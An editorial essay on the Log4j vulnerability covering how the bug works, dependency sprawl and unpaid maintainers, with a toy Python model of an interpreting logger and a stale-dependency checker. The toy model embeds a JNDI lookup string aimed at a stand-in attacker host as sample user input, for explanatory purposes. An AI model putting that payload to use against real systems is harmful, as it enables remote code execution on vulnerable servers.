Lessons from Log4j
What went wrong
There are a lot of articles describing the mechanics of this bug and how to exploit it in great detail; see this page for an extensive collection. In short: Log4j™ is a Java logging package trademarked and distributed by the Apache Software Foundation. It has found its way into many other projects and can be found all over the Internet. Indeed, according to this article, Log4j has been downloaded over 28 million times — in the last four months — and is a dependency for nearly 7,000 other projects. So a vulnerability in Log4j is likely to become a vulnerability in many other systems that happen to use it.
As the Apache Software Foundation proudly tweeted in June, it's even on the Ingenuity helicopter on Mars.
Normally, one thinks that a logging utility should accept data of interest and reliably log it. Log4j seemingly does this, but it also does something that, arguably, no logging system should do: it actively interprets the data to be logged and acts upon it. One thing it can do is query remote servers for data and include that in the log message. For example, it can obtain and incorporate data from an LDAP server, a feature that might be useful when one wishes to add information about a user's account to the log.
It turns out, though, that the remote directory server can supply other things, including serialized Java objects that will be reconstituted and executed. That turns this feature into a way to inject code into the running application that, presumably, only wanted to log some data. To exploit this opening, an attacker needs to do two things:
- Put up a server running a suitable protocol in a place where the target system can reach it. LDAP seems to be the protocol of choice at the moment, but others are possible; a grep of LWN's logs shows attempts to use DNS as well.
- Convince the target system to log an attacker-supplied string containing the incantation that will load and execute the object from the malicious server.
The second step above is often easier than it might seem; many systems will happily log user-supplied data. The hostile string may take the form of a user name that ends up in the log; the browser's user-agent string also seems to be a popular choice. Once the target takes the bait and logs the malicious string, the game is over.
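The failure mode described above can be illustrated with a toy model. The sketch below is not Log4j's code or API; ToyLogger, fake_remote_lookup, and the attacker.example host are all invented for illustration, and the "remote lookup" only records which URL it would have contacted. What it shows is the difference between a logger that expands lookups in the finished message (which already contains user-supplied data) and one that treats that data as opaque text.

```python
import re

# Toy model only: this is NOT Log4j's implementation or API. The
# "${prefix:argument}" shape mirrors the lookup strings seen in the attacks.
LOOKUP = re.compile(r"\$\{(\w+):([^}]*)\}")


class ToyLogger:
    """Hypothetical logger that can optionally interpret lookups in messages."""

    def __init__(self, resolvers, interpret_messages):
        self.resolvers = resolvers              # prefix -> callable(argument) -> str
        self.interpret_messages = interpret_messages
        self.lines = []

    def _expand(self, match):
        prefix, argument = match.group(1), match.group(2)
        resolver = self.resolvers.get(prefix)
        # Lookups with an unknown prefix are left untouched.
        return resolver(argument) if resolver else match.group(0)

    def info(self, template, *args):
        message = template.format(*args)
        if self.interpret_messages:
            # The dangerous step: expansion runs over the finished message,
            # which by now includes whatever the caller passed in.
            message = LOOKUP.sub(self._expand, message)
        self.lines.append(message)
        return message


contacted = []


def fake_remote_lookup(url):
    # Stand-in for a network fetch. In the real attack, the response could
    # carry an object that the application would go on to load and execute.
    contacted.append(url)
    return "<data from " + url + ">"


# Attacker-controlled input, for example a browser's user-agent header.
user_agent = "${jndi:ldap://attacker.example/a}"

risky = ToyLogger({"jndi": fake_remote_lookup}, interpret_messages=True)
risky_line = risky.info("request from {}", user_agent)

safe = ToyLogger({"jndi": fake_remote_lookup}, interpret_messages=False)
safe_line = safe.info("request from {}", user_agent)

print(risky_line)   # the lookup was resolved; the attacker's server was "contacted"
print(safe_line)    # the string was logged verbatim
print(contacted)
```

In this toy, only the interpreting logger ever calls the resolver; the other one records the hostile string as plain data, which is what most people expect a logging utility to do.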
This is, in other words, a case of interpreting unsanitized data supplied by the Internet, with predictable consequences; it is a failure that should have been caught in any reasonable review process. Note that the malicious strings can also be passed by front-end software to internal systems, which might then decide to log them. In other words, not being directly exposed to the Internet is not necessarily a sufficient defense for vulnerable systems. Every system using Log4j needs to be fixed, either by upgrading or by applying one of the other mitigations found in the above-linked article. Note that the initial fixes have proved to be insufficient to address all of the problems in Log4j; users will need to stay on top of the ongoing stream of updates.
The reaction to this vulnerability has been swift and strong. Some commenters are asserting that "open source is broken". Anybody who hadn't seen xkcd #2347 before has probably encountered it by now. Has our community failed as badly as some would have it? In short, there would appear to be two broad shortcomings highlighted by this episode, relating to dependencies and maintainers.
Dependencies galore
In the early days of free software, there simply was not much free code out there, so almost everything had to be written from scratch. At that time, thus, there were few vulnerable packages available for free download and use, so every project had to code up its own security bugs. The community rose to the challenge and, even in those more innocent days, security problems were in anything but short supply.
For as long as your editor has been in this field — rather longer than he cares to admit — developers and academics both have talked about the benefits of reusable software. Over the years, that dream has certainly been accomplished. Many language communities have accumulated a massive collection of modules for many common (and uncommon) tasks; writing a program often just becomes an exercise in finding the right modules and gluing them together correctly. Interfaces to repositories automate the process of fetching the necessary modules (and the modules they depend on). For those of us who, long ago, became used to the seemingly infinite loop of running configure then tracking down the next missing dependency, modern environments seem almost unfair. The challenge is gone.
This is a huge success for our community; we have created development environments that can be a joy to work within, and which allow us to work at a level of productivity that couldn't really be imagined some decades ago. There is a problem lurking here, though: this structure makes it easy for a project to accumulate dependencies on outside modules, each of which may bring some risks of its own. When you are, essentially, importing random code off the Internet into your own program, any of a number of things can happen. One of those modules could be overtly hostile (as happened with event-stream), it could simply vanish (left-pad), or it could just suffer from neglect, as appears to have happened with Log4j.
When the quality of the things one consumes is of concern, one tends to fall back to known brands. Log4j is developed under the Apache Software Foundation brand which, one might hope, would be an indicator of quality and active maintenance. Appearances can be deceiving, though; one need not look further than Apache OpenOffice, which continues to be downloaded and used despite having been almost entirely starved of development effort for years, for an example. OpenOffice users will be relieved to know, though, that (according to the project's October 2021 report) OpenOffice has finally managed to put together a new draft mission statement. Log4j is a bit more active than that, but it still depends on the free-time effort of unpaid maintainers. Apache brand or not, this project, which is widely depended on, has nobody paid to maintain it.
But, even if the brand signals were more reliable, the problem remains that it is hard to stay on top of hundreds of dependencies. A library that appeared solid and well maintained when it was adopted can look rather less appealing a year or two later, but projects lacking good maintenance often tend not to attract attention until something goes badly wrong. Users of such a project may not understand the increasing level of risk until it is too late. Our tooling makes adding dependencies easy (to the point that we may not even be aware of them); it is less helpful when it comes to assessing the maintenance state of our existing dependencies.
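As a rough illustration of what such an assessment might look like, the sketch below walks a dependency graph to find everything a project pulls in, directly or indirectly, and then flags packages with no release in the past year. Everything here is hypothetical: the package names, the graph, the release dates, and the one-year threshold are invented, and time since the last release is only a crude proxy for maintenance health.

```python
from datetime import date

# Hypothetical data: names, edges, and dates are invented for illustration.
DEPENDS_ON = {
    "my-app": ["web-framework", "report-generator"],
    "web-framework": ["logging-lib", "http-client"],
    "report-generator": ["logging-lib", "pdf-writer"],
    "http-client": [],
    "pdf-writer": ["font-tools"],
    "logging-lib": [],
    "font-tools": [],
}

LAST_RELEASE = {
    "web-framework": date(2021, 11, 2),
    "report-generator": date(2021, 6, 20),
    "logging-lib": date(2021, 10, 1),
    "http-client": date(2019, 3, 14),
    "pdf-writer": date(2021, 1, 5),
    "font-tools": date(2017, 8, 30),
}


def transitive_dependencies(root, graph):
    """Return every package reachable from root, excluding root itself."""
    seen = set()
    stack = list(graph.get(root, []))
    while stack:
        name = stack.pop()
        if name in seen:
            continue
        seen.add(name)
        stack.extend(graph.get(name, []))
    return seen


def stale_packages(packages, last_release, today, max_age_days):
    """Return, sorted by name, the packages whose last release is too old."""
    return sorted(
        name for name in packages
        if (today - last_release[name]).days > max_age_days
    )


direct = DEPENDS_ON["my-app"]
everything = transitive_dependencies("my-app", DEPENDS_ON)
flagged = stale_packages(everything, LAST_RELEASE, date(2021, 12, 15), 365)

print(len(direct), "direct dependencies,", len(everything), "in total")
print("no release in over a year:", flagged)
```

Even in this small made-up graph, two direct dependencies turn into six packages, and both of the stale ones are indirect dependencies that the application's developers never chose explicitly.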
Maintainers
A related problem is lack of development and maintenance support for projects that are heavily depended on. The old comparison between free software and a free puppy remains on point; puppies are wonderful, but if somebody isn't paying attention they will surely pee on the carpet and chew up your shoes. It is easy to take advantage of the free-of-charge nature of free software to incorporate a wealth of capable code, but every one of those dependencies is a puppy that needs to be under somebody's watchful eye.
As a community, we are far better at acquiring puppies than we are at training them. Companies will happily take the software that is offered, without feeling the need to contribute back even to the most crucial components in their system. Actually, we all do that; there is no way for anybody to support every project that they depend on. We all get far more out of free software than we can possibly put back into it, and that is, of course, a good thing.
That said, there is also a case to be made that the corporate side of our ecosystem is too quick to take the bounty of free software for granted. If a company is building an important product or service on a piece of free software, it behooves that company to ensure that said software is well supported and, if need be, step up to make that happen. It is the right thing to do in general, but it is far from an altruistic act; the alternative is a continual stream of Log4j-like crises. Those, as many companies are currently discovering, are expensive.
"Stepping up" means supporting maintainers as well as developers; it is with maintainers that the problem is often most acute. Even a project like the Linux kernel, which has thousands of developers who are paid for their work, struggles to find support for maintainers. Companies, it seems, see maintainership work as overhead at best, helping competitors at worst, and somebody else's problem in any case. Few companies reward their employees for acting as maintainers, so many of them end up doing that work on their own time. The result is projects with millions of downloads whose maintenance is done in somebody's free time — if it is done at all.
These problems are not specific to free software; discovering that a piece of proprietary software is not as well supported as was claimed is far from unheard of. Free software, at least, can be fixed even in the absence of cooperation from its creators. But the sheer wealth of software created by our community makes some of these problems worse; there is a massive amount of code to maintain, and little incentive for many of its users to help make that happen. We will presumably get a handle on these issues at some point, but it's not entirely clear how; until that happens, we'll continue deploying minimally supported software to Mars (and beyond).
